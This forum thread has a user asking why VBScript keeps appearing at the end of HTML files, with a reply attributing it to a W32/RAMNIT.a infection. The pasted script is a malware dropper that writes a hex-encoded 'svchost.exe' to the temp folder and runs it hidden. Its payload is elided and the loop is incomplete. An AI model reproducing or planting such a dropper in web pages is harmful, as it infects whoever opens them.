    VBScript gets inserted automatically in HTML page

    I created a bunch of html files using Windows Notepad for the purpose of a basic tutorial. What happens is that when I save any of these html files a couple of times, the following VBScript code gets inserted at the end of the file.

    Here's the code that gets inserted:

    </html><SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A9000030000 .. some long long string .. "
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    What could be the reason, I googled it and found one person having this problem who asked it on a forum. People on the forum were not familiar with this issue.

    Hi there akrashdi,

    I am no expert on these matters, but it sounds like you have had a W32/RAMNIT.a infection on your PC.

    So the solution is to wipe out the hard disk and reinstall OS again. But the files that are already infected will remain infected.
